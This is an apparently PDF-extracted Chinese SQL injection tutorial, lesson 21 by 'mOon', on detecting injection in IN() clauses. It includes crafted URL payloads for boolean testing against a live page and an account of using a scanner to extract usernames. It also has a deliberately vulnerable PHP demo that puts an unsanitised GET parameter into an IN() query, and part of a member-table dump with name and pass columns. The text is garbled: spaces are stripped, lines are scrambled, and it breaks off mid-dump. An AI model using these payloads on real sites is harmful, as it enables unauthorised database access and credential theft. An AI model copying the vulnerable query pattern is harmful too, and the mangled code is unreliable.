二十一课技巧之注入检测.pdfVIP

Author：mOon

第二十一课技巧之in注入检测

技巧这个in注入很操蛋检测很

的：

注入已经被哪些大牛们发掘的很深了，常见的注入语句也已被者熟知，比

如经典的1=1之类的，小竹把这些注入归类为三大类，一种是数字型的注入，一种是

字符型的注入，还有一种是搜索型的注入，其实这些手法已经借助于扫描工具来实现，

但是要是程序里面的SELECT语句是这样写的话，扫描软件一般都扫不出了。下面是

我手动注入的一次记录，在尝试了N次手动检测后，找到一个页面有，参数后加

一’使之暴错，出现以下的提示信息：

以下是片段：

DatabaseEngine错误80040e14

字符串的语法错误在查询表达式ArticleIDin(1234,5678,12345)orderbyArticleID

desc中。

/check.asp，行56

显示，这种语句是IN语句的，我们构造如下的URL进行

以下是片段：

)and1=1and(1)=(1

)a1a()

d11=(d1)andd1=1an1()=(1

页面显示订购产品信息

以下是片段：

)and1=2and(1)=(1

)a1a()

d21=(d1)andd1=2an1()=(1

订购信息置空了，看来有得玩。

然后拿出扫描工具，写上扫描注入地址点击扫描，P

都没有扫出来，不要紧，在URL中加上一个右括号)接

着扫描，OK，检测到，成功猜解出用户名

?php

mysql_connect(localhost,root,root);

mysql_select_db(yanshi);

mysql_query(setnamesUTF8);

$aid=$_GET[id];

echo$sql=SELECT*FROM`member`WHEREidIN($aid);

$os=mysql_query($sql);

$row=@mysql_fetch_array($os);

print_r($row);

?

--phpMyAdminSQLDump

--version2.11.2.1

--

--

1

Author：mOon

--主机:localhost

--生成日期:2013年02月22日15:09

--服务器版本:5.0.45

--PHP版本:5.2.5

SETSQL_MODE=NO_AUTO_VALUE_ON_ZERO;

--

--数据库:`yanshi`

--

--

--表的结构`member`

--

CREATETABLE`member`(

`id`tinyint(10)NOTNULLauto_increment,

`name`varchar(32)charactersetutf8NOTNULL,

`pass`varchar(32)charactersetutf8NOTNULL,

PRIMARYKEY(`id`)

)ENGINE=MyISAMDEFAULTCHARSET=latin1AUTO_INCREMENT=9;

--

--导出表中的数据`m